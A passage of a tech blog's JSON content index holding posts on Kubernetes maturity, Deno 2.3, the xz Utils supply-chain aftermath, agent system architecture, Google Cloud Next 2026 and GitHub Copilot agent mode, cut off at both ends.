days required deep expertise just to keep clusters running. Today, managed Kubernetes services from AWS, Google, and Azure have eliminated much of that operational overhead. The complexity has shifted from keeping the control plane running to designing and managing what runs on it.\nThe Abstraction Layer Shift # Platform engineering practices have transformed how teams interact with Kubernetes. Rather than exposing raw Kubernetes to developers, successful teams build abstraction layers — internal developer platforms that provide self-service infrastructure without requiring cluster knowledge.\nThese platforms are built on Kubernetes, but developers rarely interact with it directly. The complexity is hidden behind abstractions that reflect your organization\u0026rsquo;s practices and constraints. This pattern enables the kind of scale and developer productivity that makes sense in 2026.\nSecurity and Compliance # Running containers securely requires discipline. Container security hardening practices go beyond Kubernetes itself — they encompass how you build images, manage access, and monitor runtime behavior.\nRecent vulnerabilities like Ingress nightmare remind us that even mature platforms have security concerns. Staying current with updates and understanding potential risks is part of running Kubernetes in production.\nNetworking and Observability # The networking landscape in Kubernetes has evolved significantly. eBPF-based networking through Cilium provides both performance improvements and observability that earlier iptables-based approaches couldn\u0026rsquo;t match. This matters for both efficiency and compliance.\nSpeaking of observability, OpenTelemetry\u0026rsquo;s maturity means you have standard patterns for instrumenting containers and orchestration systems. Logging, metrics, and traces are now unified under a single standard, making it practical to understand complex systems.\nInfrastructure as Code # Managing Kubernetes declaratively requires good infrastructure-as-code tooling. OpenTofu and its predecessor Terraform provide the standard patterns, while OpenTofu\u0026rsquo;s maturity as a fork ensures you have viable open-source options free from licensing concerns.\nFor teams already deep in Kubernetes, Crossplane provides infrastructure-as-code through Kubernetes custom resources, eliminating the need for separate tooling.\nRunning AI Workloads # Kubernetes is increasingly the foundation for running ML and AI workloads. GPU infrastructure and NVIDIA\u0026rsquo;s latest capabilities matter enormously for inference workloads, and Kubernetes provides the orchestration layer that makes this practical at scale.\nMemory-aware scheduling, resource management, and the ability to mix CPU and GPU workloads make Kubernetes compelling for AI infrastructure. Docker\u0026rsquo;s Model Runner makes experimentation accessible, while Kubernetes provides production-grade infrastructure.\nEdge and Distributed Deployments # Kubernetes isn\u0026rsquo;t just for data centers anymore. Edge computing and industrial IoT deployments increasingly run Kubernetes for consistent orchestration across heterogeneous infrastructure. The ability to deploy and manage workloads consistently from cloud to edge is becoming a significant value proposition.\nCost Management and FinOps # At scale, Kubernetes infrastructure costs matter enormously. Cloud cost optimization and FinOps practices help teams understand and manage their infrastructure spend. Resource requests and limits, autoscaling policies, and reserved capacity all impact cost.\nSupporting Agent Systems # As agent-based systems become more common, Kubernetes provides the orchestration foundation for running them reliably. Agents often need to scale independently of traditional services, access diverse APIs, and maintain state across multiple invocations. Kubernetes handles all of this.\nFuture Directions # The next frontiers for Kubernetes include better support for WebAssembly workloads (beyond containers), improved multi-cluster management, and tighter integration with AI/ML workflows. WebAssembly component adoption represents one path for more efficient workloads.\nMy Take # Kubernetes won. Not in a competitive sense, but in the sense that it became the de facto standard for container orchestration. The platform is mature enough that the interesting work isn\u0026rsquo;t about Kubernetes itself — it\u0026rsquo;s about what you build on top of it.\nFor teams still evaluating whether to use Kubernetes: the answer is almost certainly yes. The ecosystem is mature, the tooling is good, and managed services eliminate most operational pain. The real question is how you build platforms on top of Kubernetes that give developers the abstractions they need without exposing unnecessary complexity.\nThe maturity is permanent. Kubernetes will continue to improve and evolve, but it\u0026rsquo;s no longer the source of operational stress it once was. That\u0026rsquo;s progress worth celebrating.\n","date":"20 April 2026","externalUrl":null,"permalink":"/posts/260420-kubernetes-container-orchestration-maturity/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The evolution of Kubernetes from novel technology to boring infrastructure, and what that means for teams running containerized workloads.","title":"Kubernetes \u0026 Container Orchestration — From Infrastructure to Invisible Foundation","type":"posts"},{"content":"","date":"20 April 2026","externalUrl":null,"permalink":"/series/kubernetes--containers/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Kubernetes \u0026 Containers","type":"series"},{"content":"Deno 2.3 dropped this week with workspace support for monorepos and further improvements to Node.js compatibility. Meanwhile, Bun continues to iterate rapidly, and Node.js itself keeps absorbing good ideas from its competitors. After years of runtime fragmentation anxiety, I\u0026rsquo;m starting to think the JavaScript server-side ecosystem is reaching a productive equilibrium. Let me explain why.\nWhat\u0026rsquo;s New in Deno 2.3 # The headline feature in Deno 2.3 is native workspace support. If you\u0026rsquo;re managing a monorepo with multiple packages — and who isn\u0026rsquo;t these days — Deno now handles cross-package dependencies, shared configurations, and coordinated builds without external tooling. This closes one of the biggest gaps that kept teams from adopting Deno for larger projects.\nThe workspace implementation is thoughtful. Each workspace member gets its own deno.json configuration, but they inherit from a root configuration. This approach mirrors unified Python tooling consolidation where simpler configuration hierarchies improve developer experience. Dependencies can be shared across the workspace or scoped to individual packages. The lockfile is unified, preventing version conflicts between packages. If you\u0026rsquo;ve dealt with the complexity of npm workspaces, yarn workspaces, or pnpm workspaces, you\u0026rsquo;ll appreciate how clean this feels.\nNode.js compatibility continues to improve. Deno 2.3 now supports over 95% of npm packages without any compatibility flags or shims. The remaining 5% are packages that rely on Node.js-specific internals or native addons with Node-specific build systems. For most practical applications, you can now drop Deno into an existing Node.js project and it just works.\nThe built-in toolchain also got updates: deno fmt now supports CSS and HTML formatting, deno lint has new rules for accessibility in JSX, and deno test gained snapshot testing. These built-in tools continue to be one of Deno\u0026rsquo;s strongest selling points — no need to configure Prettier, ESLint, and Jest separately.\nThe State of the Three-Runtime Landscape # Let me step back and look at the bigger picture. We now have three serious JavaScript/TypeScript runtimes: Node.js, Deno, and Bun. Two years ago, this felt like chaos. Today, it feels like healthy competition that\u0026rsquo;s driving all three to improve.\nNode.js remains the default for most teams, and for good reason. The ecosystem is massive, the tooling is mature, and the long-term support model gives enterprises confidence. Node 22, currently in LTS, brought native TypeScript support via type stripping, a stable permission model inspired by Deno, and significant performance improvements. Node.js is no longer the \u0026ldquo;boring, old\u0026rdquo; option — it\u0026rsquo;s actively incorporating the best ideas from its competitors.\nBun carved out a niche as the performance-focused runtime. Its bundler, test runner, and package manager are all blazing fast, and for projects where build time and startup time matter — think serverless functions, CLI tools, edge computing — Bun offers real advantages. The 1.x series has been stable enough for production use, and I know several teams running Bun in production without issues.\nDeno is positioning itself as the \u0026ldquo;correct by default\u0026rdquo; runtime. Security permissions, TypeScript support, web-standard APIs, built-in tooling — it\u0026rsquo;s the runtime that makes the right thing easy and the wrong thing hard. The 2.x series removed the friction that kept teams from adopting it, particularly around npm compatibility.\nWhy This Competition Is Healthy # I\u0026rsquo;ve seen people lament JavaScript runtime fragmentation, but I think the competition has been enormously beneficial. Consider what Node.js has adopted from its competitors in the past two years: built-in TypeScript support (from Deno\u0026rsquo;s influence), a permission model (directly from Deno), improved test runner (Bun showed how good built-in testing could be), and faster startup times (competitive pressure from Bun).\nWithout Deno and Bun pushing the boundaries, Node.js would still require a separate TypeScript compiler, a pile of configuration files, and five different tools for tasks that should be built in. Competition created convergence toward better defaults.\nThe ecosystem is also more portable than people fear. Well-written JavaScript and TypeScript code runs on all three runtimes with minimal changes. The web-standard API convergence — using fetch, Request, Response, Web Streams — means that most code doesn\u0026rsquo;t rely on runtime-specific APIs. The WinterCG (Web-interoperable Runtimes Community Group) has been instrumental in driving this standardization.\nChoosing a Runtime in 2026 # So which runtime should you use? My pragmatic advice:\nChoose Node.js if you\u0026rsquo;re building enterprise applications with large teams, need maximum ecosystem compatibility, or require long-term support guarantees. It\u0026rsquo;s the Toyota Camry of runtimes — reliable, well-supported, and nobody ever got fired for choosing it.\nChoose Deno if you\u0026rsquo;re starting a new project, value security defaults, want a batteries-included development experience, or are building with TypeScript from the start. The developer experience is genuinely superior for greenfield projects.\nChoose Bun if performance is your primary concern — serverless functions, CLI tools, build-heavy workflows — or if you\u0026rsquo;re in an environment where startup time directly impacts user experience.\nFor most of my consulting work, I recommend Node.js for existing projects and Deno for new ones. I explored the JavaScript runtime landscape at the start of this year, and the convergence has only accelerated since. The Bun Rust rewrite demonstrates how language choices and performance optimization continue to drive runtime innovation. This parallels how Node.js supply chain security concerns are driving more deliberate ecosystem choices. The code you write is increasingly portable between them, reflecting standards like those in WebAssembly components.\nMy Take # The JavaScript runtime landscape in 2026 is healthier than it\u0026rsquo;s ever been. Competition has driven innovation, standards have reduced fragmentation, and developers have genuine choices without catastrophic lock-in. Deno 2.3\u0026rsquo;s workspace support removes one of the last practical barriers to adoption for team-based projects.\nWhat I\u0026rsquo;m most excited about is the meta-trend: all three runtimes are moving toward batteries-included, secure-by-default, TypeScript-native experiences. Tooling like Biome and unified Python/JavaScript tooling are accelerating this shift toward consolidated, performant developer tools. AI-assisted development is also reshaping how we approach testing and quality across all these runtimes. The days of spending a day configuring your development toolchain before writing any application code are ending. AI-assisted development is also reshaping how we approach testing and quality, with runtimes gaining better support for agent-based development patterns.\nThis is part of my ongoing Developer Landscape series, tracking the tools, frameworks, and practices shaping modern software development.\n","date":"16 April 2026","externalUrl":null,"permalink":"/posts/260416-deno-2-3-runtime-wars/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Deno 2.3 brings workspace support and improved Node compatibility. With Bun maturing and Node.js evolving, the JavaScript runtime landscape is reaching an interesting equilibrium.","title":"Deno 2.3 and the Runtime Wars — Is Server-Side JavaScript Finally Settling?","type":"posts"},{"content":"It\u0026rsquo;s been nearly two years since Andres Freund\u0026rsquo;s accidental discovery of the xz Utils backdoor sent shockwaves through the open source community. This week, the OpenSSF published their annual report on open source supply chain security, and the findings are a mixed bag. We\u0026rsquo;ve made real progress in some areas, but the fundamental vulnerabilities that enabled the xz attack remain largely unaddressed. As someone who\u0026rsquo;s relied on open source infrastructure for my entire career, this hits close to home.\nWhat the OpenSSF Report Found # The numbers tell an interesting story. Adoption of SLSA (Supply Chain Levels for Software Artifacts) frameworks has roughly tripled since the xz incident. More projects now publish SBOMs (Software Bill of Materials), and the Sigstore ecosystem has seen massive growth — over 40 million signatures recorded in the public transparency log. Package registries like npm, PyPI, and crates.io have all implemented or strengthened mandatory two-factor authentication for maintainers of popular packages. This parallels broader security infrastructure improvements we\u0026rsquo;ve seen in cloud security responses and enterprise patch management strategies.\nThese are genuine improvements. Before the xz incident, supply chain security felt like an abstract concern that security teams worried about and developers ignored. Now there\u0026rsquo;s real tooling, real adoption, and real investment. The OpenSSF\u0026rsquo;s Scorecard project rates over 1.2 million repositories, giving consumers visibility into the security practices of the software they depend on.\nBut here\u0026rsquo;s the uncomfortable truth: none of these measures would have prevented the xz attack.\nThe Social Engineering Gap # The xz backdoor wasn\u0026rsquo;t a technical exploit of a build system or a compromised dependency. It was a multi-year social engineering campaign where the attacker built trust within the project community, gradually took over maintenance, and then introduced the backdoor through a series of seemingly innocuous changes. No SBOM, no code signing, no scorecard would have caught this because the attacker was the trusted maintainer. This represents a pattern we\u0026rsquo;ve seen repeat across the ecosystem — from the Ultralytics supply chain attack to PyTorch Lightning malware — where attackers gain legitimate access before injecting malicious code.\nThis is the hardest problem in open source security, and we still don\u0026rsquo;t have good answers. How do you verify the intentions of a contributor? How do you distinguish a helpful new maintainer from a sophisticated threat actor playing a long game? The uncomfortable answer is that you often can\u0026rsquo;t.\nSome projects have responded by requiring multiple maintainer sign-off for releases, which helps but also increases the burden on already-overworked volunteers. The Linux kernel has long had a culture of rigorous review, but most open source projects don\u0026rsquo;t have the contributor base to sustain that level of scrutiny. Organizations like npm have learned this lesson the hard way through repeated supply chain compromises and are now mandating stricter governance, reflecting lessons from earlier major incidents like SolarWinds.\nThe Maintainer Sustainability Crisis # The deeper issue that the xz incident exposed — and that we still haven\u0026rsquo;t addressed — is maintainer sustainability. Jia Tan was able to take over xz Utils in part because the original maintainer was burned out and struggling with mental health issues. This isn\u0026rsquo;t unique to xz; it\u0026rsquo;s the default state of countless critical open source projects maintained by one or two unpaid volunteers. The broader development tooling and language ecosystem has faced similar pressures as maintainers of popular packages burn out from volunteer work.\nThe OpenSSF and Linux Foundation have launched funding programs, but the scale doesn\u0026rsquo;t match the problem. Thousands of projects that form the foundation of modern infrastructure are maintained by individuals who do it in their spare time for no compensation. These maintainers are single points of failure, and they\u0026rsquo;re exhausted.\nSome companies have stepped up. Google\u0026rsquo;s Assured Open Source Software program now covers over 2,000 packages with paid security review. GitHub\u0026rsquo;s Sponsors program has grown. The GitHub Actions supply chain attack demonstrated that even well-funded platforms need continuous security improvements. But these efforts collectively cover a tiny fraction of the open source ecosystem.\nTechnical Mitigations That Actually Help # While we can\u0026rsquo;t solve the social engineering problem completely, there are technical approaches that reduce the blast radius of a compromised maintainer. Reproducible builds — where anyone can independently verify that a binary was built from the claimed source code — would have caught the xz backdoor, since the malicious code was injected during the build process, not visible in the source repository.\nProjects like Reproducible Builds have been advocating for this for years, and adoption is growing but still limited. I wrote about SLSA adoption accelerating recently, and reproducibility is one of the areas where progress has been slowest. Debian now has over 95% of packages reproducible, which is impressive. But most software distribution channels don\u0026rsquo;t verify reproducibility, making it a theoretical rather than practical defense. The TanStack npm compromise earlier this year showed that even automated tooling can miss malicious injections until they\u0026rsquo;re already in the wild.\nAnother promising approach is build provenance attestation — cryptographic proof of how, when, and where a software artifact was built. GitHub Actions now generates SLSA provenance attestations automatically, and npm has started verifying these attestations during package installation. This creates an auditable chain from source code to deployed artifact that\u0026rsquo;s much harder to subvert. Cloud platform advances are enabling better build verification and attestation at scale. These mechanisms are essential for combating malware campaigns that exploit transparency gaps in package ecosystems.\nMy Take # Two years after xz, I\u0026rsquo;d give the industry a C+ on supply chain security. We\u0026rsquo;ve built better tools, adopted better practices, and raised awareness. But we haven\u0026rsquo;t addressed the root causes: maintainer burnout, underfunding of critical infrastructure, and the inherent trust assumptions in open source collaboration. Governance gaps persist across ecosystems, revealing how deeply supply chain vulnerabilities remain woven into our infrastructure.\nThe cynical view is that we\u0026rsquo;ll forget about supply chain security until the next major incident. I hope that\u0026rsquo;s wrong, but the pattern is familiar — a crisis drives investment, attention fades, investment slows, and the cycle repeats. Just as we saw with zero-day patch cycles and state-sponsored breaches, the security community is caught in an endless loop of response and recovery.\nWhat can you do individually? Audit your dependency tree. Know which packages you depend on and who maintains them. Contribute back — not just code, but funding, bug reports, documentation. And if you\u0026rsquo;re building security tools, focus on the maintainer experience. The best security measure is one that maintainers actually adopt because it makes their lives easier, not harder.\nFor organizations, governance frameworks and policy implementation around software supply chain risk are increasingly becoming regulatory requirements, not just best practices. The ransomware ecosystem continues to evolve with sophisticated attack patterns that often start with supply chain compromise, and proactive defense strategies are increasingly critical.\nThe industry\u0026rsquo;s response to xz demonstrates that we can coordinate at scale. We have the tools, the awareness, and the motivation. Whether we maintain that momentum when the news cycles move on to the next crisis remains the question.\nThe open source ecosystem is the most extraordinary collaborative achievement in the history of software engineering. It deserves better than the neglect we\u0026rsquo;ve given it.\nThis is part of my ongoing Security in Practice series, exploring real-world security challenges and practical responses.\n","date":"9 April 2026","externalUrl":null,"permalink":"/posts/260409-xz-utils-supply-chain-anniversary/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Nearly two years after the xz Utils backdoor shocked the open source world, the supply chain security landscape has changed — but not enough.","title":"The xz Utils Aftermath — One Year Later, What Have We Actually Fixed?","type":"posts"},{"content":"Agent-based systems represent a fundamental shift in how we architect software. Rather than request-response systems where humans interact with tools, agents observe state, plan actions, and execute autonomously. Understanding the patterns that make these systems work is essential for building them responsibly.\nFoundation: Reasoning and Planning # At the heart of every agent is reasoning. The rise of agent-based systems shows us that this isn\u0026rsquo;t theoretical — agents are in production, handling real workflows. The capability to reason over multiple steps, adapt to failures, and recover gracefully is what distinguishes agents from traditional chatbots.\nThis reasoning capability comes from advances in model architecture. Extended thinking models introduce deliberate reasoning steps, while reasoning-focused models prioritize deep thinking over speed. These capabilities are what make autonomous planning actually work.\nThe Tooling Layer # Agents are only as good as the tools they can access. Model context protocol adoption standardizes how agents discover and interact with APIs and data sources. But before you standardize, you need to build a robust tool layer.\nThis means clear API contracts, proper error handling, and graceful degradation when tools fail. Agents need detailed documentation of available tools, and that documentation lives in the context window.\nComputer Use and Direct Interaction # Early agents were constrained to calling well-defined APIs. Anthropic\u0026rsquo;s computer use capabilities changed that by letting agents interact directly with systems — clicking buttons, filling forms, navigating UIs. This massively expands what agents can accomplish, but also introduces new failure modes.\nIntegration with Development Workflows # The most immediate application of agent-based systems for developers is in code generation and testing. GitHub Copilot\u0026rsquo;s agent mode represents one major milestone, while AI-assisted testing shows how agents help validate the code they generate.\nThese applications benefit from Docker\u0026rsquo;s Model Runner and similar tools that make running models accessible in development environments. The ability to experiment locally, then scale, is essential for building reliable agent systems.\nObservability and Monitoring # If you don\u0026rsquo;t understand what your agent is doing, you can\u0026rsquo;t trust it. OpenTelemetry\u0026rsquo;s maturity and its comprehensive logging, metrics, and tracing capabilities make it practical to instrument agent systems thoroughly.\nLog every reasoning step, every tool call, every decision. When something goes wrong, you need full visibility. Observability should be built in from the beginning, not bolted on.\nCost and Resource Management # Agents with large context windows and multiple reasoning loops can rack up significant costs. Cloud cost optimization becomes critical at scale.\nThe infrastructure supporting agents also matters. Kubernetes and modern orchestration provides the foundation for scaling agent workloads reliably, while platform engineering practices ensure operators have good visibility and control.\nGovernance and Compliance # Autonomous systems that take actions without human intervention require governance. The EU AI Act sets specific requirements for systems making consequential decisions, and agent systems often fall into this category.\nTeams building agents need to implement robust audit trails, human oversight capabilities, and decision monitoring from the start. This isn\u0026rsquo;t optional bureaucracy — it\u0026rsquo;s the foundation of systems that operate safely at scale.\nSupply Chain and Safety # As agents become more capable, the supply chain and safety implications grow. Understanding supply chain security best practices applies to AI systems as much as traditional software. Know where your models come from, how they\u0026rsquo;re built, and what guarantees they provide.\nReal-World Challenges # In production, agents face real constraints. The broader ecosystem continues to mature, with frameworks and tools designed specifically for building reliable agents. Cost management, consistency, and hallucination remain challenges, but they\u0026rsquo;re engineering problems we know how to address.\nMy Take # Agent-based systems aren\u0026rsquo;t coming — they\u0026rsquo;re here. The architecture patterns are emerging, the tooling is maturing, and teams are deploying them successfully. The question for your organization is: which of your workflows are appropriate for autonomous execution, and what do you need to build responsibly?\nThe teams that start building now with proper observability, governance, and cost management will have significant advantages. Those that try to retrofit these concerns later will struggle. Treat your agents like critical systems from day one, because once they\u0026rsquo;re in production, they will be.\n","date":"5 April 2026","externalUrl":null,"permalink":"/posts/260405-agent-systems-architecture-patterns/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Explore architecture patterns for building agent-based systems, from reasoning loops to tool integration and operational governance.","title":"Agent Systems Architecture Patterns — Building Autonomous Decision-Making Systems","type":"posts"},{"content":"","date":"5 April 2026","externalUrl":null,"permalink":"/tags/systems-design/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Systems Design","type":"tags"},{"content":" Overview # The cloud platform landscape evolves constantly. AWS, Azure, and Google Cloud announce new services, pricing changes, and strategic pivots regularly. This series monitors these changes—analyzing what new services mean for architects, understanding pricing implications, and tracking strategic moves that signal where cloud computing is heading.\nStaying informed helps you avoid technical debt, take advantage of new capabilities, and make cost-effective platform decisions.\nWhat You\u0026rsquo;ll Find Here # New Service Announcements: Deep-dive analysis of major new services from the cloud providers—what problem do they solve, how do they compare to existing options, and should you consider them?\nPricing Changes: Understanding pricing dynamics, comparing costs across providers, and identifying optimization opportunities when prices shift.\nFeature Evolution: Improvements to existing services, capability additions, and how services compete for workload migration.\nStrategic Positioning: Which bets are the cloud providers making (AI, data, serverless), and what does that signal about the market?\nMulti-Cloud Trends: Hybrid cloud, multi-cloud strategies, and the tooling that reduces vendor lock-in.\nMarket Dynamics: Competitive positioning, market share shifts, and acquisitions reshaping the platform ecosystem.\nLearning Path # Understand the major cloud providers — their service portfolios, strengths, and strategic differences Track pricing carefully — understand cost implications of new services and pricing changes Evaluate new services — frameworks for determining if new capabilities solve your problems Plan architecture strategically — decisions that avoid lock-in while leveraging platform strengths Monitor competitive dynamics — recognize shifts in market leadership and changing platform strategies Key Platforms \u0026amp; Services Covered # AWS: EC2, Lambda, S3, RDS, DynamoDB, and emerging AI services Azure: Virtual Machines, Cosmos DB, App Service, and Microsoft-specific integration Google Cloud: Compute Engine, BigQuery, Vertex AI, and data/analytics focus Emerging Players: Hetzner, Vultr, and niche cloud providers Pricing Models: On-demand, reserved instances, spot/preemptible pricing, and data transfer costs Strategic Services: AI/ML platforms, serverless, managed databases, and containerization Related Series # Explore complementary areas: Cloud Operations (operating on cloud platforms), Kubernetes \u0026amp; Containers (container infrastructure across clouds)\n","date":"2 April 2026","externalUrl":null,"permalink":"/series/cloud-platform-watch/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Cloud Platform Watch","type":"series"},{"content":"Google Cloud Next wrapped up in Las Vegas this week, and while the AI announcements grabbed headlines, the most significant developments were in the platform engineering space. Google is clearly betting that the next phase of cloud adoption isn\u0026rsquo;t about raw infrastructure — it\u0026rsquo;s about making developers productive. After attending virtually and digesting the keynotes, here\u0026rsquo;s what matters for practitioners.\nThe Platform Engineering Push # Google\u0026rsquo;s messaging this year is unmistakable: platform engineering is no longer optional, it\u0026rsquo;s how serious organizations do cloud. This aligns with broader cloud FinOps and engineering ownership trends where platform engineering becomes the foundation of cost-effective cloud operations. The new Cloud Developer Hub is an opinionated developer portal built on Backstage patterns but deeply integrated with GCP services. It provides service catalogs, golden paths for deployment, and self-service infrastructure provisioning — all the things that platform teams have been building manually for the past few years.\nWhat makes this interesting is the level of integration. Developer Hub connects directly to Cloud Build, GKE, Cloud Run, and Artifact Registry, providing a unified experience from code commit to production deployment. It\u0026rsquo;s not just a dashboard; it\u0026rsquo;s an actual workflow engine that enforces your organization\u0026rsquo;s standards while staying out of the developer\u0026rsquo;s way.\nGoogle also introduced Application Design Centers — essentially pre-built reference architectures that teams can customize and deploy. Need a microservices setup with proper observability, security boundaries, and CI/CD? Pick a template, customize the parameters, and deploy. I\u0026rsquo;m cautiously optimistic about this. The templates I\u0026rsquo;ve seen are well-architected and avoid the oversimplification that plagues most starter projects.\nGemini in Cloud Operations # The Gemini integration across Google Cloud\u0026rsquo;s operations suite has matured significantly. Gemini for Cloud Operations now provides natural language querying across logs, metrics, and traces. Instead of writing complex MQL queries, you can ask \u0026ldquo;why did latency spike on the payment service at 3 AM?\u0026rdquo; and get a synthesized answer that correlates log entries, metric anomalies, and trace data.\nI\u0026rsquo;ve been skeptical of AI-powered observability — the demos always look better than the reality. But the live demonstrations at Next showed some genuinely impressive root cause analysis. The system identified a cascading failure across three services, traced it back to a connection pool exhaustion in a database proxy, and suggested the specific configuration change needed. That\u0026rsquo;s the kind of analysis that used to take a senior SRE an hour during an incident. This reflects advances in AI-assisted problem solving and observability standardization.\nThe caveat is that this works best within Google\u0026rsquo;s own observability stack. If you\u0026rsquo;re using a mix of Datadog, Grafana, and Google Cloud Monitoring — which many organizations do — the cross-tool correlation is limited. Google clearly wants you all-in on their platform, which is a reasonable business strategy but not always practical.\nGKE Autopilot Maturation # GKE Autopilot got several updates that address the complaints I\u0026rsquo;ve heard from teams trying to use it for production workloads. The new fine-grained resource controls let you specify exact CPU and memory ratios, GPU scheduling preferences, and node affinity rules without dropping down to Standard mode. These improvements address the resource management challenges that Kubernetes 1.32 was designed to solve. Spot instance support is now more granular, allowing you to specify which workloads can tolerate preemption and which can\u0026rsquo;t.\nThe new multi-cluster fleet management features are also noteworthy. Managing multiple GKE clusters across regions has always been painful, with configuration drift being the primary headache. Google\u0026rsquo;s fleet-level policy engine now lets you define cluster configurations centrally and enforce them across your entire fleet. It\u0026rsquo;s similar to what tools like Crossplane and Cluster API provide, but integrated natively into GCP\u0026rsquo;s control plane.\nWhat About Multi-Cloud? # The elephant in the room at any single-vendor conference is multi-cloud. Google\u0026rsquo;s messaging has shifted subtly here. Rather than arguing for GCP exclusivity, they\u0026rsquo;re positioning GKE Enterprise (formerly Anthos) as the Kubernetes layer that runs everywhere. The new distributed cloud features let you run GKE on-premises, on other clouds, and at the edge with a consistent management plane.\nThis is pragmatic. Most enterprises I work with run workloads across at least two cloud providers, and trying to fight that reality is a losing battle. Google seems to have accepted this and is competing on developer experience rather than lock-in — which, frankly, is a more sustainable strategy.\nMy Take # Google Cloud Next 2026 felt more focused than previous years. Instead of announcing dozens of new services, Google is investing in making existing services work better together. The platform engineering narrative is smart — it addresses the real pain point that most organizations face, which isn\u0026rsquo;t \u0026ldquo;which cloud services should we use?\u0026rdquo; but rather \u0026ldquo;how do we make our developers productive on the cloud we\u0026rsquo;ve already chosen?\u0026rdquo;\nThe Gemini integrations are impressive but need real-world validation. Conference demos are carefully scripted, and production environments are messy, unpredictable places. I\u0026rsquo;ll reserve judgment until I\u0026rsquo;ve used these tools during an actual 3 AM incident.\nIf your organization is already on GCP or considering it, the platform engineering tools announced this week are worth evaluating seriously. If you\u0026rsquo;re a platform team building internal developer platforms, study what Google is doing with Developer Hub — even if you don\u0026rsquo;t use GCP, the patterns and abstractions are well thought out and applicable to any cloud. The multi-cloud strategy reflects the reality that infrastructure-as-code tools like Terraform enable consistent deployments across vendors.\nCross-Cluster Topics # This infrastructure hub connects to other topic clusters:\nDevelopment + Infrastructure: See how WebAssembly components, Rust in the Linux kernel, and Python\u0026rsquo;s free-threading revolution are reshaping systems programming and deployment patterns AI + Infrastructure: GTC 2026 AI infrastructure and edge AI/IoT deployments discuss how cloud platforms support AI workloads at scale Security + Infrastructure: xz Utils aftermath and supply chain security governance show how infrastructure teams implement supply chain defense This is part of my ongoing Infrastructure Notes series, covering developments in cloud platforms, DevOps, and infrastructure engineering.\n","date":"2 April 2026","externalUrl":null,"permalink":"/posts/260402-google-cloud-next-2026/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google Cloud Next 2026 put platform engineering front and center, with new tools for developer experience, Gemini-powered operations, and a maturing GKE ecosystem.","title":"Google Cloud Next 2026 — Platform Engineering Takes Center Stage","type":"posts"},{"content":"","date":"26 March 2026","externalUrl":null,"permalink":"/tags/github/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"GitHub","type":"tags"},{"content":"GitHub officially made Copilot\u0026rsquo;s agent mode generally available this week, and the developer community is buzzing. After months in preview, the feature that lets Copilot autonomously plan, write, and iterate on multi-step coding tasks is now available to all Copilot subscribers. Having spent considerable time with the preview, I have some thoughts on where this fits in a professional workflow — and where it doesn\u0026rsquo;t.\nFrom Autocomplete to Autonomous Agent # The evolution of Copilot has been fascinating to watch. What started as a fancy autocomplete tool in 2021 has steadily grown into something far more ambitious. Agent mode represents a fundamental shift: instead of suggesting the next line of code, Copilot can now take a high-level instruction — \u0026ldquo;add authentication to this API endpoint\u0026rdquo; or \u0026ldquo;refactor this module to use the repository pattern\u0026rdquo; — and autonomously determine which files to edit, what changes to make, run terminal commands, and iterate based on errors.\nUnder the hood, agent mode leverages the latest foundation models from OpenAI and Anthropic, combined with GitHub\u0026rsquo;s deep understanding of repository context. This represents the broader evolution of AI-powered development tools. It reads your project structure, understands your coding conventions, and attempts to produce changes that feel like they belong in your codebase. The key word there is \u0026ldquo;attempts.\u0026rdquo;\nWhat Actually Works Well # I\u0026rsquo;ve been using agent mode in preview across several projects, and there are genuine bright spots. For boilerplate-heavy tasks — setting up new API routes, creating test scaffolding, adding standard CRUD operations — it\u0026rsquo;s remarkably effective. What used to take me 30 minutes of tedious copy-paste-modify work now takes about 5 minutes of reviewing and tweaking agent output.\nThe terminal integration is particularly impressive. When agent mode writes code that doesn\u0026rsquo;t compile or fails tests, it reads the error output and iterates. I\u0026rsquo;ve watched it fix its own type errors, install missing dependencies, and correct import paths across multiple files. This self-correcting loop is what separates agent mode from the earlier inline suggestions.\nWhere it also shines is in codebases with strong conventions. If you have consistent patterns — say, every service follows the same interface, every API endpoint has the same middleware chain — agent mode picks up on these patterns and replicates them faithfully. It\u0026rsquo;s essentially learned your team\u0026rsquo;s style guide from context.\nWhere It Falls Short # Let\u0026rsquo;s be honest about the limitations. Agent mode struggles with architectural decisions. Ask it to \u0026ldquo;design a notification system\u0026rdquo; and you\u0026rsquo;ll get something that works but might not be the right abstraction for your specific constraints. It doesn\u0026rsquo;t understand your team\u0026rsquo;s roadmap, your scale requirements, or the political dynamics of your organization that influence technical choices.\nI\u0026rsquo;ve also noticed it can be confidently wrong in subtle ways. It\u0026rsquo;ll produce code that passes tests but introduces a race condition, or it\u0026rsquo;ll use an API pattern that\u0026rsquo;s technically correct but performs poorly at scale. These are exactly the kinds of bugs that are hardest to catch in review because the code looks right.\nThe token window, while large, still limits how much of a large codebase the agent can reason about simultaneously. In monorepos with hundreds of packages, it sometimes makes changes that conflict with distant parts of the codebase it hasn\u0026rsquo;t loaded into context.\nThe Changing Role of Code Review # What concerns me most isn\u0026rsquo;t the quality of the generated code — that will improve. It\u0026rsquo;s the impact on code review culture. When a developer writes code by hand, the review process is a conversation between two humans who both understand the intent and constraints. When an agent writes the code, the reviewer is essentially auditing machine output, which requires a different and arguably more demanding skillset. This is similar to the challenges we see with AI-assisted testing, where human oversight remains critical.\nI\u0026rsquo;ve already seen junior developers on my team approve agent-generated PRs with a cursory glance because \u0026ldquo;Copilot wrote it, so it\u0026rsquo;s probably fine.\u0026rdquo; This is dangerous. We need to be more rigorous in reviewing AI-generated code, not less, precisely because the failure modes are different from human-written code.\nTeams adopting agent mode should invest in better automated testing, stronger linting rules, and clear guidelines about which types of tasks are appropriate for agent mode versus human authorship. These patterns apply across agent-based systems more broadly. The core principle remains: AI tools augment judgment, they don\u0026rsquo;t replace it.\nMy Take # After thirty years of writing software, I\u0026rsquo;ve seen plenty of tools that promised to change everything. Most delivered incremental improvements. Copilot agent mode is genuinely useful — it\u0026rsquo;s the first AI coding tool where I regularly think \u0026ldquo;that saved me real time\u0026rdquo; rather than \u0026ldquo;that was a neat 